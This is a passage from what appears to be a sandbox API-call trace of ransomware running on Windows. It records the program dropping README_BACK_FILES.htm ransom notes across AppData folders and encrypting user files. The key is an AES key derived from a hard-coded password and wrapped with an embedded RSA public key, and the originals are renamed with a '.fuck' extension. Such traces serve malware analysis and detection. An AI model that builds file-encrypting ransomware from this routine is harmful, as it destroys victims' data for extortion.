hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0266.889] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0266.889] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\readme_back_files.htm")) returned 0xffffffff [0266.889] AreFileApisANSI () returned 1 [0266.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6bb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0266.895] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0266.896] GetFileType (hFile=0x5d10) returned 0x1 [0266.896] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0266.897] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0266.897] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\InputPersonalization\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0266.898] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.898] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.898] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7fc00 [0266.899] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.899] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0266.899] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0266.899] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\readme_back_files.htm")) returned 0xffffffff [0266.899] AreFileApisANSI () returned 1 [0266.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0266.900] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0266.904] GetFileType (hFile=0x5d44) returned 0x1 [0266.904] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0266.905] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0266.906] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0266.906] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\InputPersonalization\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\inputpersonalization\\readme_back_files.htm")) returned 0xffffffff [0266.906] AreFileApisANSI () returned 1 [0266.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28893b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0266.906] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\InputPersonalization\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\inputpersonalization\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0266.908] GetFileType (hFile=0x5d10) returned 0x1 [0266.908] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0266.910] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0266.910] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0266.911] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.911] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.911] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0266.911] GetLastError () returned 0x0 [0266.911] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt")) returned 0x20 [0266.911] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", dwFileAttributes=0x80) returned 1 [0266.912] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0266.913] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.914] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.gsg", dwFileAttributes=0x2) returned 1 [0266.915] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2e7a500) returned 1 [0266.917] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0266.917] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0266.917] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0266.917] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2e7ec80) returned 1 [0266.917] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0266.917] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0266.917] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2e78498) returned 1 [0266.917] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78498, dwCertEncodingType=0x1, pInfo=0x2eb0820*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0850*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0858*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2e7f600) returned 1 [0266.917] CryptEncrypt (in: hKey=0x2e7f600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0266.918] CryptEncrypt (in: hKey=0x2e7f600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78b80*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2e78b80*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0266.918] WriteFile (in: hFile=0x5d48, lpBuffer=0x2e78b80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2e78b80*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0266.918] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.920] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.920] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.922] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.922] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.922] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.922] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.922] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.922] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.922] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.922] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.923] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.923] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.923] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.923] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.923] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.923] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.923] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x137, lpOverlapped=0x0) returned 1 [0266.923] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x137, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x140) returned 1 [0266.923] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x140, lpOverlapped=0x0) returned 1 [0266.923] CloseHandle (hObject=0x5d44) returned 1 [0266.923] CloseHandle (hObject=0x5d48) returned 1 [0266.923] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), bFailIfExists=0) returned 1 [0266.926] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", dwFileAttributes=0x0) returned 1 [0266.926] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.gsg")) returned 1 [0266.927] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.fuck")) returned 1 [0266.928] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0266.929] CryptDestroyKey (hKey=0x2e7ec80) returned 1 [0266.929] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0266.929] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.929] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0266.933] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.933] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.933] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0266.933] GetLastError () returned 0x0 [0266.933] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\en-us.1")) returned 0x20 [0266.933] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1", dwFileAttributes=0x80) returned 1 [0266.934] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\en-us.1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0266.934] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\en-us.1.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0266.935] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1.gsg", dwFileAttributes=0x2) returned 1 [0266.936] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2e7a500) returned 1 [0266.938] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0266.938] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0266.938] CryptHashData (hHash=0x2e7ec80, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0266.938] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7ec80, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f480) returned 1 [0266.939] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0266.939] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0266.939] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e78c90) returned 1 [0266.939] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78c90, dwCertEncodingType=0x1, pInfo=0x2eb0410*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0440*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0448*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f640) returned 1 [0266.939] CryptEncrypt (in: hKey=0x2e7f640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0266.939] CryptEncrypt (in: hKey=0x2e7f640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78520*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2e78520*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0266.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2e78520*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2e78520*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0266.975] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.121] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.121] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.183] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.183] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.183] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.183] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.183] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.183] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 